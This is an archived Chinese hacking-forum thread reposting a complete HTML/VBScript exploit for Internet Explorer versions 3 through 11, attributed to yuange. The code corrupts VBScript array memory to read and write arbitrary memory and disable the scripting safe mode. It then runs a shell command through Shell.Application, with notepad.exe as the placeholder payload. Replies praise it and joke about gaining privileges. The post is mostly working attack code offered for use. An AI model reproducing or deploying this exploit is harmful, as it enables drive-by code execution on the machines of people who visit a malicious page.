win95+ie3-win10+ie11 浏览器执行漏洞

C4r1st 发表于 2014-11-13 10:06:53

转自：http://hi.baidu.com/yuange1975

最新ie下测试成功。

测试图为实际测试

//*

allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.

http://twitter.com/yuange75

http://hi.baidu.com/yuange1975

*//

<!doctype html>

<html>

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >

<head>

</head>

<body>

<SCRIPT LANGUAGE="VBScript">

function runmumaa()

On Error Resume Next

set shell=createobject("Shell.Application")

shell.ShellExecute "notepad.exe"

end function

</script>

<SCRIPT LANGUAGE="VBScript">

dim aa()

dim ab()

dim a0

dim a1

dim a2

dim a3

dim win9x

dim intVersion

dim rnda

dim funclass

dim myarray

Begin()

function Begin()

On Error Resume Next

info=Navigator.UserAgent

if(instr(info,"Win64")>0) then

exit function

end if

if (instr(info,"MSIE")>0) then

         intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))

else

exit function



end if

win9x=0

BeginInit()

If Create()=True Then

myarray=    chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)

myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then

      document.write("<br> IE")

      document.write(intVersion)

      runshellcode()

else

      setnotsafemode()

end if

end if

end function

function BeginInit()

Randomize()

redim aa(5)

redim ab(5)

a0=13+17*rnd(6)

a3=7+3*rnd(5)

end function

function Create()

On Error Resume Next

dim i

Create=False

For i = 0 To 400

If Over()=True Then

' document.write(i)

   Create=True

   Exit For

End If

Next

end function

sub testaa()

end sub

function mydata()

On Error Resume Next

i=testaa

i=null

redimPreserve aa(a2)

ab(0)=0

aa(a1)=i

ab(0)=6.36598737437801E-314

aa(a1+2)=myarray

ab(2)=1.74088534731324E-310

mydata=aa(a1)

redimPreserve aa(a0)

end function

function setnotsafemode()

On Error Resume Next

i=mydata()

i=readmemo(i+8)

i=readmemo(i+16)

j=readmemo(i+&h134)

for k=0 to &h60 step 4

   j=readmemo(i+&h120+k)

   if(j=14) then

         j=0

         redimPreserve aa(a2)

aa(a1+2)(i+&h11c+k)=ab(4)

         redimPreserve aa(a0)

j=0

         j=readmemo(i+&h120+k)



            Exit for

      end if

next

ab(2)=1.69759663316747E-313

runmumaa()

end function

function Over()

On Error Resume Next

dim type1,type2,type3

Over=False

a0=a0+a3

a1=a0+2

a2=a0+&h8000000

redimPreserve aa(a0)

redim ab(a0)

redimPreserve aa(a2)

type1=1

ab(0)=1.123456789012345678901234567890

aa(a0)=10



If(IsObject(aa(a1-1)) = False) Then

   if(intVersion<4) then

      mem=cint(a0+1)*16

      j=vartype(aa(a1-1))

      if((j=mem+4) or (j*8=mem+8)) then

         if(vartype(aa(a1-1))<>0)Then

            If(IsObject(aa(a1)) = False ) Then

               type1=VarType(aa(a1))

            end if

         end if

      else

         redimPreserve aa(a0)

         exitfunction

      end if

   else

      if(vartype(aa(a1-1))<>0)Then

         If(IsObject(aa(a1)) = False ) Then

               type1=VarType(aa(a1))

         end if

         end if

   end if

end if



If(type1=&h2f66) Then

      Over=True

End If

If(type1=&hB9AD) Then

      Over=True

      win9x=1

End If

redimPreserve aa(a0)



end function

function ReadMemo(add)

On Error Resume Next

redimPreserve aa(a2)

ab(0)=0

aa(a1)=add+4

ab(0)=1.69759663316747E-313

ReadMemo=lenb(aa(a1))

ab(0)=0

redimPreserve aa(a0)

end function

</script>

</body>

</html>

super 发表于 2014-11-13 10:39:13

win10 不能拨号忧桑

KD、 发表于 2014-11-13 11:46:12

哎呀，好屌！

神仙发表于 2014-11-13 16:40:55

啪的一下添加账户了

Whysec 发表于 2014-11-13 18:33:00

啪的一下，我的权限

zhoujian017 发表于 2014-11-14 13:25:25

啪的一下，我的权限

蓝色_ 发表于 2014-11-14 22:05:58

啪的一下，我的权限

幽暗发表于 2014-11-14 23:30:15

啪的一下，我的权限

小雨发表于 2014-11-14 23:52:57

没什么要
函数

神风发表于 2014-11-14 23:59:31

这个有点6666

页: [1] 2

红客联盟 - 由08安全团队运营's Archiver

win95+ie3-win10+ie11 浏览器执行漏洞